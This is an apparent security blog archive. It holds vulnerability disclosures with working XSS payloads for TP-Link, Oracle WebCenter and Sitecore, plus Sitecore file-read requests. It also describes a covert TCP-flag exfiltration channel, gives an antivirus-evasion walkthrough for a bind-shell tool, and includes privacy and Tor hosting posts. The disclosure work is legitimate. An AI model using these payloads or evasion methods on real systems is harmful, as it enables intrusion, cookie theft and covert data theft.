TP-Link wireless router Archer C1200 – Cross-Site Scripting

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]

Hello folks. An Input validation vulnerability was found in TP-Link Archer c1200 v1.0, which results in client side code execution.

[+] Unauthenticated

[+] Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU

[·] Impact: Client side attacks are very common and are the source of maximum number of user compromises. With this attack, the threat actor can steal cookies, redirect an innocent victim to a malicious website, thus compromising the user.

[·] Reason: The remote webserver does not filter special characters or illegal input.

[+] Attack type: Remote

[+] Patch Status: Unpatched

[+] Exploitation:

[!] The Cross-site scripting vector can be executed, as illustrated below

http://hostname/webpages/data/_._.<img src=a onerror=alert(“Reflected-XSS”)>../..%2f

[-] Responsible Disclosure:

  • April, 2018 – Contacted TP-Link via their web based form
  • May, 2018 – No Reply yet
  • May 26, 2018 – Public Disclosure

TCP based covert channel (ChorTCP)

While researching on data exfiltration techniques and covert channels, I thought of making one of my own, dubbed ChorTCP. Though protocol over protocol tunneling is a well known concept but I really wanted to actually try to hypothesize one aspect and then implement it, just for fun. The abstract below is taken from the white paper, as is. The main benefit of this technique is that any deep packet inspection firewalls will not be able to see. The traffic will, at most, seem like a malformed traffic.

Introduction

ChorTCP is a covert channel created over TCP protocol. The overall concept revolves around the exfiltration of data without sending any data on the application layer level. This is accomplished by sending specially crafted packets with specific flags enabled — to the server. When packets generated are analyzed — they appear to be either random scans or malformed traffic.

Detailed description

The technique requires two components — a server and a client. The client is used to exfiltrate data and to be sent to the server. To bypass analysis and what data is being exfiltrated — flags are used. The advantage of this technique is that the sending and receiving protocol and the dictionary can be changed thus having many possible iterations of the same exfiltration technique.

The dictionary selected for this technique is the Morse-code cipher dictionary. Which has been modified for the current requirements of the technique. The details of the POC will be described later in this chapter but for now the protocol would be illustrated.

In Mores-code “.” And “-” are represented as short tone and long tone respectively. For sending Morse-code style data on TCP/IP network via the flags subtle changes were required. This would be explained later in the chapter.

Under the hood

The exfiltration protocol works with 4 Flags — [SYN, FIN, PSH, URG]. This technique is versatile and if required the flags can be changed.

The data exfiltration is performed using the SYN and URG flags. The PSH and the FIN flags are used for delimiter purposes. As mentioned earlier that the dictionary used was that of Morse-code and then was changed to fit the current technique. The “.” And “-” was replaced with SYN and URG respectively. Moreover — few other characters were also added. Thus — converting the Morse-code dictionary into:

 

Any data that the client program encounters — is encoded and then sent to the server on a specific port. The server does not open a socket to listen on the port — but in fact sniffs the traffic for the mutually decided port. The protocol works as follows:

As per the data which is to be exfiltrated each character is converted into code of SYN and URG. Which means that the character ‘r’ in the word root is converted to ‘SSSUUSU’ which would send SYN packets 3 times and then send 2 URG packets and then a SYN and an URG.  The server on the other end would convert the incoming SYN and URG into ‘r’.

The protocol explained:

  1. The protocol for a non-NAT environment is illustrated below [Implemented in the POC]:

 

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|URG|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|FIN|—> Server

This packet tells the server that end of letter has reached

Server —|PSH|—> Client

The Server responds with acknowledgement by sending a PSH packet

Client —|SYN|—> Server

The client resumes the next character.

Once the word has reached, the client sends a FIN + PSH packet to the server informing for an end of word. This process keeps going until the end of data has reached.

 

  1. The protocol for the NAT network is illustrated below. It is to note that — this option is yet to be implemented and would not be a part of the POC.

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|URG|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|FIN|—> Server

This packet tells the server that end of letter has reached

Server —|PSH|—> Client

The Server responds with acknowledgement by sending a PSH packet

Client —|SYN|—> Server

The client resumes the next character.

It was observed that, in the environment where the implementation was tested, Network Address Translation for the FIN, PSH and URG packets was not happening. It was tested against TP-Link home wireless router and F-Secure Sense. Thus, the solution of removing the PSH packet from the protocol was hypothesized, this would remove the overhead of the Client waiting for an acknowledgement from the Server.  

POC (ChorTCP)

The POC is implemented using Python and Scapy library. The POC would be uploaded soon. The code can be downloaded here…

Way Forward

The SYN based scanner would be implemented on the client side to first detect which ports are accessible outbound from the Target box and once determined — the client would start using that port for exfil. Moreover — as the server would be sniffing traffic on all the ports but when it receives a packet with same source and destination port — it would only start sniffing that port.

This was a very basic concept and has been tested on Non-NAT networks. Though more sophistication, as for example, adding functions to detect if the firewall is blocking the requests etc would be added later on.

 

The Art of Privacy – Part 3

This is the best part of the whole series, as in this part I will tell you, what to do to protect yourself from prying eyes, whether the prying eyes are of hackers, or oppressing regimes (This is such a relative term 🙂 ). It’s usually such a good feeling when you realize and appreciate that your thoughts are your own, imagine if some of us could read your mind and could siphon off anything that you think and then mine the data and extract the useful bits of information and then use it. Well this is what is going on nowadays, in the cyber world, which has already been discussed previously (briefly) in this series.

So, how do I become invisible to everyone and even to a point where one has contingencies to if life turns into an iRobot’s plot.

The privacy protection can be divided into two parts:

Physical – In context of cyber

Cyber

Physical protection entails protection of your credit card data, protection of your phone’s screen information. Please keep in mind, this is not a tutorial to learn Kungfu and protect your wallet or phone from thieves, this is more in the context of what data an attacker can extract by not even making contact with you and how you can secure it, so that all the attacks are rendered unsuccessful.

Nowadays, if we notice, all credit/debit cards are contact-less, which means, in layman’s terms, you can just touch the point of sales machine with the card and you are good to go. It is a well-known fact that any threat agent can use cheap hardware to extract information from the credit card from afar. Same goes for the bus cards, tram/train tickets, etc. They all use RFID technology now.

The easiest way to protect them from an attack is to use a wallet with RFID protection. You can find many different kinds of wallets in the super market. If you love your own wallet, or your wife gave that as a gift and if you won’t use it, you will be sleeping outside of your house, then my friends, there is another solution, you can easily buy RFID protection sleeves which can hold your cards and then you can put them into your wallet. You can buy them from anywhere as well. I have been using the sleeves as well in my wallet. I got the F-Secure ones, work pretty well.

Information from the phones can be protected by adding a privacy screen protector on your phone. It comes for Android devices and iPhone/iPad/iWhatevertheycomeupwithNext.

Cyber based protection entails everything which is done online or offline, but dealing with the non-physical, bitbytes!! In case of Cyber, the threat actors have already been explained in the previous articles of this three part series.

The first thing one must and I say MUST do, is to install a VPN. VPNs are virtual private networks, which in a nutshell, encrypt all traffic between you and their server. Think of it as an underground tunnel which uses a special train which makes you invisible so you can easily pass through any barriers, and exit the city you want to exit undetected and then carry on. Usually when your traffic is going through the network, it looks like this (again a lot is going on but just to explain my point, it is illustrated so simply):

You ==> Your ISP — |Prying eyes| ===> Google/Facebook/Instagram/Blah/Blah and Blah

When you are going through a VPN:

You =|Encrypted tunnel|=> VPN server (ISP? WHO/WHAT?) ===> Google/Facebook/Instagram/Blah/Blah and Blah

So, that was that, VPN is a must if you want to stay anonymous, of course, one should never abuse this. Never do anything illegal!

The VPNs which I have personally used are F-Secure Freedome and Private Internet Access, which are quite good, with respect to price, log retention, speed.

Secondly, browser addons are your best friends. Addons like NoScript, Disable WebRTC, HTTPS Everywhere, uBlock Origin, User-Agent switcher. These are some of the addons for Mozilla Firefox. If you are a Chrome user then find equivalent addons.

Using proxies is usually not a good option to anonymize your traffic. As using WebRTC one can get your real IP, unless it is disabled on the browser side. Furthermore, by using Javascript one can extract your real IP. So, in short, don’t use proxies.

TOR is another good example of how to keep yourself anonymous. It is to note that TOR works as a proxy but it is untraceable. The operating system as well as all other apps which are not proxy aware and have not been explicitly provided, the IP for the proxy, they will connect to their respective services normally, and not through TOR.

Just to remember, if you are using TOR, never use your credentials on websites which do not run on HTTPS.

These are some of the things that Privacy health-conscious people use to protect themselves. I would recommend this to all the great readers out there.

Stay Safe.

 

~Peace

The Art of Privacy – Part 2

The biggest threat to privacy is the attitude of “AH, what would someone do with my email address, phone number or social security number”. Thanks to the awareness in security and security terminology becoming a fad and the names of attacks becoming more and more attractive, non-security savvy people are starting to somewhat understand the tricks malicious attackers use to lure people into giving out their private information.

Unfortunately, this isn’t enough. Privacy threat actors range from a 13 year old sitting on a computer to state sponsored hackers to law enforcement to advertising agencies, which technically are working within the bounds of the law and aren’t doing anything illegal.

The problem, which I have been talking for ages, is that there is so much unprotected personal information available on the internet that you cannot pin point and blame a specific person for taking the data and using it. We then have a problem of data leaks, for example the recent Equifax data leak. Data leaks and public dumps are a recent trend. In the early 2000’s there were more breaches because, well SQL Injection was new, even now SQL injection is almost 50% of the times, the reason of a breach, imagine when it was new, and google dorking was new, how many databases would have been dumped and would have roamed around in the underground but they never made the news or they weren’t available for anyone to download.

The dumps of emails and passwords leaked from Linkedin, Twitter etc. are now on several websites. As an example, please find the two websites below:

https://haveibeenpwned.com

https://hacked-emails.com/

Technically they do not show you the password for anyone else but just tell you if your email is in the hacked databases list, but they have all the raw data so…

I have been using a website called Pastebin for years now, which is quite valuable when it comes to find your leaked information. Google is also a very well-known platform for finding leaked information using google dorks.

Well, if we talk about data leaks, one can argue that it is not an individual’s fault that the data got leaked. It was because of an Apache Struts (Unpatched, though the patch was released like ages ago) vulnerability, 🙂 that the server got pwned! Yes, so that is not the individual’s fault. It is the individual’s fault when he is in the military and gives the whole detail about what he is doing and on which technology, so that anyone can track him down. What happens when people do that, you ask? ICWATCH happens!!!! It is also the individual’s fault, when he puts all his/her pictures public on Facebook or Instagram or any other social networking website. What someone can do with my picture from Facebook, you ask, it is not a social security number or your phone number, you say? I would just give an example, or two, of what they can do, apart from selling your picture to advertisers or a bad bad man getting a hold of your pictures, extracting the GPS location embedded into the pictures, thank you smartphones, and get your home address:

Example: So let’s talk about cryptocurrency, Bitcoin and the whole shebang. Oh, so, cryptocurrency is untraceable? Right? What do we do? Well, what the high end exchanges now do is that they require your picture taken from a camera and any photo-ID, for you to be able to get registered to that exchange and setup a wallet and so on. After that whatever transaction you do can be chained back to your account and inevitably to you. Unless you are using Monero!! So, about the attack, let’s call the attacker, “Evil Joe”! Evil Joe gets you selfie picture from Facebook which he/she conveniently finds online as it is public. Uses that picture for first round of verification and in the second round, uses a different picture and photoshops it onto a photo-ID, scans it and uploads it. Next, sets his username and password and boom, he has stolen your Face identity. Now whatever transaction he does, comes back to your face and as most law enforcement agencies have facial recognition, they will contact you and you are in trouble, at least until they are sure that you weren’t involved.

One, other scenario that I would like to briefly describe is that for example you have facial recognition on your Samsung S8. A thief steals your phone or purse (Ladies), what he can do with it, search your name on the internet, on Facebook, if he finds your public picture somewhere, where your face is prominent, he can use that to unlock your phone.

There are many other attacks, social engineering being the most effective, but for that I would refer to different books as this has been covered thoroughly by many people.

Recently, I saw a very well renowned political figure of A country, on twitter. She shared a picture of a document where she did not think of removing the name, phone number and social security number of another government official. I think that was because she has no concept of why exposing social security number is a very bad thing.

In the third part, I would explain how to protect yourself from these threat actors and how to be anonymous and invisible to prying eyes.

~Peace

The Art of Privacy – Part 1

This is a three-part special. The first part of this three-part special would include, what privacy means to a normal person, how it impacts the normal day-to-day life of that person, the facts about what is going on in the cyber world, in terms of privacy.

The second part would comprise of the mistakes that are made by people and the mindset that people have about internet privacy.

The third and the final part would include how you can protect yourself against attacks, even if you aren’t computer savvy. You will also be introduced to technologies being used nowadays to defend against privacy breaches.

Part 1:

Lets start with what privacy is, though all of you might already know what it is. Privacy is the right of an individual to keeps his/her’s private stuff, private. Technology is a part of our life now and unfortunately, the threat landscape is quite big, in terms privacy.

You might have heard about IOT (Internet of things) which means, all the devices that are connected to the internet and to each other, for example Cameras, locks, fridges etc. There have been many security concerns about IOT devices, which I will not be covering here.

Technology has become closely intertwined with our daily lives. Cell phones, for example, instead of having different devices for different tasks, now smart phones have everything in one package, such as GPS, 3G/4G, Bluetooth, NFC, which are technologies which have many applications in our day-to-day life. Internet, a technology that we are so dependent on, that a little disruption in it causes serious discomfort to us. These technologies, can be attacked to invade one’s privacy.

Security and Privacy have always had a love/hate relationship. Complete security requires privacy breach at some level, which becomes a problem in case of complete privacy. Last year General Data Protection Regulation (GDPR) was adopted in the EU which has several detailed points about the protection of privacy for the EU citizens and residents. This is a very good thing, but to be honest, this protects against our data on services such as Google, or any other corporate entities. What about hackers, intelligence agencies, cyber armies? How should we protect ourselves against them? How can we keep our personal information personal? Though I will tell the good readers on how to protect one’s privacy online, in the part 3 of this article.

Now, I would like to briefly talk about the attacks against privacy. Recently, we heard about NSA snooping into mobile networks and reading SMS etc. Due to the leaks, the world now knows about Hacking Team and Finfisher, which are the companies who blatantly sell command and control implants to governments and even law enforcement agencies, which were initially used to spy on activists, journalists, etc. Nowadays, due to the threat of increasing cybercrime, the implants might be used against normal people, if they are persons of interest to law enforcement. For example, the recent Surveillance law in Germany, which empowers the German police to read WhatsApp messages of people who become person of interest to the police. Though direct interception is not possible, most probably, they would be using some kind of social engineering technique to install the police controlled implant onto the cell phone of their target. Similar surveillance powers are or will be given to the police in the UK.

To be very clear, if the person has committed a crime and/or, well, if he is a bad guy, which is quite hard to know, unless it is Tom Cruise’s Minority Report, and there is a pre-crime unit, but still, I am completely in favor of this surveillance law, in that case. But knowing which of the suspect is a real bad guy and which of the suspects is an innocent, is quite hard to know, thus there would be quite a big range of false positives, who would lose their privacy as collateral.

There have been so many cases of identity thefts in different countries due to breaches, leaks, phishing etc. With your identity stolen, you can lose your bank accounts, can end up in the police wanted list, can come under serious debt, etc. Apart from identity theft, GPS spoofing, where you can be sent somewhere else and the information that you contain may be taken by force, cell phone hacking, television hacking and voice snooping, implants to intercept internet traffic at the ISP end, SMS interception, SS7 based attacks, all of which are attacks against normal people and which are used to compromise confidentiality and breach privacy of the intended targets.

I would be, in the end of this three-part article, mention different books covering privacy and how to be invisible.

Thanks for reading.

Part 2 would be coming out soon!

Peace!

Want to be heard and can’t register a domain?

Back when I had dial-up internet, I used to host stuff on my computers and give my public IP to friends so that they could enjoy or make use of, what I had to share. Back then there wasn’t any Facebook, hi5, orkut, or any chat mobile apps. The only cool thing we had was IRC (\\// Live long and prosper). I felt so empowered that I could host something on my computer and share it with friends, ok, so what if I got DOSed (denial of service), many times and my computer froze because, well I had windows 98 installed. That was the time when “Ping of death” was a thing. Good times though. Coming back to the topic, as I mentioned that I could host stuff online and ask people to connect to my IP, well the bandwidth was very poor so that model didn’t work so well, and did I mention, I got DOSed, many times. Nowadays, there are a lot of online services, free website hosting like “110mb.com, wordpress.com, blogger.com, etc”. Many people use these services and are super happy with it.

Sometimes you want to share something and want to keep it on your own computer. How do you do that? Well, some of you might say: “We have a DSL/Fiber connection, we can setup reverse NAT and we are good to go”. My answer to them is that what if your public IP changes? That becomes a problem! I recently saw this television program about Darknet and how only bad people use it and if you are a criminal, then you are on a Darknet. Well, all this is quite dramatic to be honest. Yes, criminals use it, but it wasn’t designed for them, they use it because of the anonymity features.

To solve the above mentioned problem, TOR can be used. Yes, TOR is an anonymizing software and can be used to host websites or any kind of service. There are some very simple steps to set it up. You can set it up on your computer or a raspberry pi. Follow the simple steps to install a hidden service:

  1. Install TOR, apt-get install tor
  2. Edit Tor configuration file: nano /etc/tor/torrc
  3. Find the section with hidden services and edit: HiddenServicePort <port on onion> 127.0.0.1:<mapped internal port>
  4. Setup a hidden service directory and add it to the config file </blah/hidden_service/>. Chmod it to 700 (Some times TOR complains about lose permissions)
  5. Run tor.. Get the onion domain name from the hostname file.
  6. Have fun!!!!

Once it is setup you can see your .onion domain name in the hostname file, but to access it you have to be in TOR network, but there is some good news as well, you can access it from the internet as well, via Tor2web. It is rather simple, really, if you have a domain, “myblahblahblahdomain.onion”, you just add a “.to” to the end and you are good to go. So, the end URL would be: “http://myblahblahblahdomain.onion.to/”.

That is it, you are good to go and enjoy your free hosting.

Antivirus Evasion

A few weekends back i was wondering how do malware evade antivirus solutions, is it really that easy ?

With that in mind i started looking at some known malware piece and randomly pick a anti malware solutions to my surprise AVs can still be tricked with old technique such as string substitution method, so today we will explore this very well known technique. For testing purpose i choose ncx as a test malware which binds itself on port 99 and when someone connects to ncx it gives command prompt of the system.

First let’s scan the default malware to check if it’s detected or not.

 

 

 

 

 

 

 

 

 

 

 

 

As it can be seen in below screenshot that ncx is detected by our antivirus

 

Let’s split file into small chunks, after a bit of trial and error i found that splitting into 17 bytes does not break any signature of av, the trick here is we have to keep splitting files as long as the av keeps flagging those files

 

On scanning split chunks two detection were made by our av i.e chunk 1 and 4 were identified as malicious

 

 

Change lower case ‘cmd’ to upper case ‘CMD’ and save it

 

 

Yes no more detection !

 

 

In sixth line of split chunk number 1 let’s change upper case ‘S’ to lower case ‘s’ and save it

 

 

Scan it again, and av no longer detects this chunk.

 

 

Finally join files back

 

 

Rename the joined file

 

 

Scan shows no more detection 🙂

 

 

And we can see on execution it is indeed listening on port 99

 

 

POC Video:-

 

Oracle Web Center XSS

Oracle Web Center XSS
Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2

Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana


Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]

Description
========================================================================================
Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center,
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.

Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO


http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>

 


Solution
========================================================================================
Apply Oracle CPU July 2017

Downside of keeping everything public – ICWATCH

I have been writing and preaching about Social network information harvesting and why it is a bad thing (Check out the post here). I recently stumbled upon something, which is, publicly known though, but still worth mentioning. The mentioned “something” is a very good example of why too much information about one’s self is never a good idea.

I was having some fun with Riddler the other day. For those who do not know what Riddler is, well it is F-Secure’s search engine for web domains and much more. Unlike Shodan where all ports are scanned and then the headers are saved in a database, Riddler can be used to query about specific domains and subdomains and get some very very interesting information. So, as I was saying, that I was having fun with Riddler and I stumbled upon a strange subdomain of (Strange subdomain).

The ICWATCH, contains public database of mainly LinkedIn profiles of people in the United States government employees. Though the website is publicly known. It was quite astonishing to see how much information people have posted on their Linkedin accounts. It makes sense if someone is in sales or normal private sector job, but giving so much information and revealing what the person does, for intelligence community is, well not advised, in my opinion.

Back to the point, open-source intelligence (OSINT) is completely legal and any person/agency can easily gather information about anyone without committing a crime. I usually talk about advertisers, malicious hackers, social engineers etc, who use this to take advantage of the information collected and harm innocent users. People should keep in mind that tracking people across multiple social networking platforms is a trivial job nowadays, for a skilled hacker.

It is very important, not to disclose personal information on the internet. Especially social networks like Linkedin, Facebook, etc. Sharing personal stuff is never a bad thing, but people should be smart about what they share. If you are working for the government, there is no need of writing everything about what you do, on your Linkedin profile.

Peace!

Sitecore CMS v 8.2, cross site scripting & arbitrary file access

Hi folks,

Multiple vulnerabilities were found in the Sitecore version 8.2. Which were reported to Sitecore CMS on the 5th of May,2017. A patch was released on the 27th of June, 2017. It is recommended to update the Sitecore CMS installation. The exploit is being made public after the patch has been released.

Exploit:[CVE-2017-11439, CVE-2017-11440]

Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net

Disclaimer: Everything mentioned below is for educational puposes. The vulnerability details are mentioned as is. I would not be held responsible for any misuse of this information.

Summary:
Multiple vulnerabilities were found in the Sitecore product. The vulnerabilities include two instances of arbitrary file access and once instance of reflected cosssite scripting.

1: Arbitrary file access:

– Description:

The vulnerability lies in the tools which can be accessed via the administrator user. The vulnerability exists because there is no bound check for absolute path in the application, that is, if the absolute path is provided to the vulnerable URL, it reads the path and shows the contents of the file requested.

– Exploit:
1. Once authenticated as the administrator perform a GET request to the followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini

2. Once authenticated as the administrator perform a POST request to the followiung URL:

POST /sitecore/admin/LinqScratchPad.aspx HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1

__VIEWSTATE= <OMITTED> &__VIEWSTATEGENERATOR= <OMITTED> &__EVENTVALIDATION= <OMITTED> &LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%5Cwin.ini&Fetch=

 

2. Reflected Cross-site Scripting:
– Description:
The application does not sanatize the USER input which allows a normal authenticated user to exploit this vulnerability.

 

– Exploit:

POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>

&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A// <OMITTED> /sitecore/shell/Applications/Tools/Run&__CSRFTOKEN= <OMITTED> &__VIEWSTATE= <OMITTED> &__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(document.cookie)%3B%22%3E%3C%2Fiframe%3E

++++++++++++++++++++++++++++++++++++++++++++++++++++

Time-Line:

  • Initial inquiry – May 5, 2017
  • Vulnerability advisory submission – May 5, 2017
  • Patch release – June 27, 2017
  • Publicly released – July 3, 2017